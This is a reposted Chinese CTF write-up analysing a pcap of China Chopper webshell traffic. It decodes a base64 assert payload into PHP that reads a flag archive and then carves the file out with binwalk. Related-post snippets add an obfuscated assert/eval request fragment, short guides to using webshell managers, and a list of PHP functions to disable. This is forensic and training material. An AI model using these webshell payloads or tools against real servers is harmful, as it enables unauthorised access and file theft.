Bugku 分析 中国菜刀

最新推荐文章于 2021-12-04 13:51:51 发布
最新推荐文章于 2021-12-04 13:51:51 发布
阅读量156 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/fantasquex/p/10351617.html
版权

解压之后得到了一个流量包,只有不到10KB,美滋滋

先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的

随便打开一条pos

是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=)

得到了一串php代码

@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<\'5.3.0\')
{
    @set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\\\wwwroot\\\\flag.tar.gz";
$fp=@fopen($F,\'r\');
if(@fgetc($fp))
{
    @fclose($fp);
    @readfile($F);
}
else
{
    echo(\'ERROR:// Can Not Read\');
};
echo("X@Y");
die();

就是说打印一个叫flag(等等flag?)的文件,并在前后打印X@Y

快乐,只要找到flag.tar.gz就好了

最后一条response中就有这个文件

既然是一个文件中包含另一个文件,那就试一试binwalk

提取并解压,即可得到flag

 

转载于:https://www.cnblogs.com/fantasquex/p/10351617.html

weixin_30674525
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugKu-分析-中国菜刀(两种解法)
渗透、攻防、CTF、编程
07-05 1961
文件caidao.zip,解压后caidao.pcapng 分析两种方法:流量包里导出压缩包和binwalk直接分析文件 方法一:流量包tcp流导出压缩包 搜索http,总共6个流浪包,逐个分析
bugku ctf 分析 中国菜刀 (国产神器)
qq_42777804的博客
05-27 1864
下载后解压后打开 我做的方法直接 改后缀名为 .zip 再次解压 打开后 用记事本打开 得到 flag 另一种放到 Linux中 使用binwalk -e binwalk -e 文件路径 ”,得到分离后的文件 我把它拿出来 (因为在 Linux中我不会使用解压命令哈哈哈) 改为 .zip 解压后 打开 ...
Bugku Misc 中国菜刀
我,我的博客
08-07 813
附件下载,解压,wireshark打开 注意到其中的一个TCP流中包含有敏感信息: binwalk 提取,得到一个压缩包,无法解压,于是vim一下, 结束: key{8769fe393f2b998fa6a11afe2bfcd65e} 80 Points Get!...
【CTF】Bugku分析中国菜刀
LainWith的博客
08-07 1026
首先需要注册一个账号才能做题,进入之后全局网页搜索“菜刀”即可找到题目。地址 由于题目是菜刀,所以流量一定是HTTP协议类型,先来过滤一下数据包 追踪TCP流,发现目标 得嘞,就从200OK的包里面分析 先从第一个开始 看到了目标 由于目标是个压缩包,所以选择解码为“压缩” 然后无论怎么改变“开始”也看不到任何信息 搞下一个包 同上,第二个更改解码为“压缩”无果 再搞最后一个包 当开始位置调到3时,又结果了 答案:key{8769fe393f2b998fa6a11afe2bfcd65e}
bugku杂项题writeup
11-22
bugku杂项题writeup
BUGKU】CTF >>分析---中国菜刀
Chenamao的博客
08-09 2203
目录 【BUGKU】CTF >>分析---中国菜刀BUGKU】CTF >>分析---中国菜刀 解压完成后发现为pcapng文件格式 利用wireshark (我们的小鲨鱼)打开文件。 第一个数据包: 可以看出客户端用POST方式访问服务器的3.PHP文件 POST请求 123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."O..
bugkuctf-分析-菜刀
wuerror的博客
02-01 1177
1.打开下载的压缩包,里面是个pcapng文件。用wireshark打开。 先看看http 包比较少而且info里也没什么特别的信息,每个点开看看 在第四个包里发现了一句话,重点来了! 看下一个包,他做了什么。选中第五个包,右键选择追踪HTTP流 base64解码$xx(' ')引号内的内容 发现他尝试读取flag.tar.gz文件,且在头尾输出了X@Y.接着看第六个H...
bugku——分析(流量分析)题解
小锤队长的博客
10-19 4293
目录 1,flag被盗 2,中国菜刀 3,这么多数据包 4,手机热点 5,抓到一只苍蝇 6,日志审计 7,weblogic 8,信息提取(超详细) 9,特殊后门 1,flag被盗 ctrl + f 打开搜索框,搜flag ,找到 93 个数据包里有 flag.txt字样, 右键,追踪 TCP数据流,在其中看到了 flag: flag{This_is_a_f10g}...
Bugku 杂项 爆照(08067CTF)
xingyyn78的博客
02-27 9151
这是个很有意思的题目。从网站上可以下载下一张图片。使用foremost进行提取,可以提取出一个压缩包。压缩包包含一个动图,和8张没有后缀名的文件。使用binwalk分析每张图片,发现88,888,8888,存在修改的痕迹。很明显88文件有个二维码,通过扫描获得bilibili。8888文件隐藏了个图片文件,分解出的图片为二维码图片,扫描获得panama根据flag格式,推测888文件也可以获取一部...
php如何过滤中国菜刀站软,Hack神器-中国菜刀-(shell管理)
weixin_39909859的博客
03-10 192
中国菜刀,不是原来切菜做饭的道具,而是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。功能介绍:只要网页是非静态页面:也就是支持动态脚本的网站 (asp,jsp,aspx,php),都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理...
php 安全禁止函数,防中国菜刀:禁用 php 函数 增强网站安全
weixin_39593061的博客
03-09 140
许多主机商都会禁用许多的 php 自带函数,以保证主机安全等。就在前一段时间 ,一位用户将中国菜刀这个工具作为问题提交到 Wooyun 了,所以我们不得不做点什么了!今天就发这个文章,主要说说推荐禁用的函数和禁用方法,顺便放张图:我哭了!然后又被骂了,于是乎…… 现在创智主机全部节点均禁用了中国菜刀。我推荐禁用的函数:view source 1 dl,exec,popen,system,phpin...
黑站利器-中国菜刀的功能介绍和使用方法
weixin_33835103的博客
02-14 1129
黑站利器-中国菜刀的功能介绍和使用方法中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。http://pan.baidu.com/s/...
Bugku分析题目解析
北观止的博客
07-31 3139
Bugku分析 参考 https://ctf.yuanlichenai.cn/2018/09/18/Bugku/Packet/ 1.flag被盗 flag被盗,赶紧溯源! 一个shell.php 里面包含一个flag的text 或者http筛选,右键,追踪流,http流 得到flag:flag{This_is_a_f10g} 2.中国菜刀caidao 参考: https://ctf.yuanlichenai.cn/2018/03/19/Bugku/Misc-2 下载得到一个压缩包,解压出来是流量包 用wir
中国菜刀使用与原理分析
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀的使用 原理分析
CTF-练习平台-Misc之 中国菜刀,不再web里?
weixin_30632089的博客
12-14 442
八、中国菜刀,不再web里? 下载文件后解压,是一个数据包,用wireshark打开,题中说的是菜刀,那就找http协议,首先过滤出http协议包 在第四个里面找到一句话木马 Flag应该在木马之后拿到的,所以找下一个http包,追踪一下流 发现base64编码,解码一下,最后两个%3D是两个=,改过来 从代码里可以看到传输文件是flag.tar.gz,前后还有字符“...
渗透工具环境篇——Cknife中国菜刀的使用
Litbai_zhang
10-09 2万+
提要 在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀的使用方法。 使用 1.下载菜刀,打开Cknife.jar软件 2.右键点击添加 3.输入上传的php文件,php文件密码,脚本类型选择PHP,字符编码GB2312,点击添加 4.右键文件管理 成功 ...
bugku 中国菜刀 writeup
ZKCQM23的博客
03-20 3477
自己真的是很愚笨,参考了很多,才终于了解了。用 wireshark 写的也参考了很多大神的写法http://www.bugku.com/thread-11-1-1.html也有位大佬补充了一点http://blog.csdn.net/Sanky0u/article/details/76167670但考虑可能小白真的白(比如我),所以根据自己的思路再补充一点(做这个真的有点抓狂了,所以想补充)用wi...
Bugku 杂项 中国菜刀
xingyyn78的博客
02-19 6015
在网站上下载下的是一个caodao.zip压缩包,解压缩得到caodao.pcapng文件。使用wireshark打开caodao.pcapng,查看TCPstream。发现信息中包含flag.tar.gz,flag应该就包含在一个压缩包中。使用binwalk进行分析caodao.pcapng文件。文件中包含一个压缩包,使用binwalk进行提取,并解压缩,获得flag.txt,打开文本获得fla...
bugku - 杂项(misc)部分 writeup
热门推荐
Peithon的博客
06-07 3万+
花了一些时间把bugku中的杂项题整理了一下,记录这些题目的解题思路,尤其是一般杂项中的一些套路 1.签到 扫码 2.这是一张单纯的图片 1.jpg 将图片下载到本地,使用winhex打开图片,在末尾有一组数据信息 &amp;amp;amp;amp;amp;#107;&amp;amp;amp;amp;amp;#101;&amp;amp;amp;amp;amp;#121;&amp;amp;amp;amp;amp;#123;&amp;amp;amp;amp;
buuctf菜刀666
最新发布
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值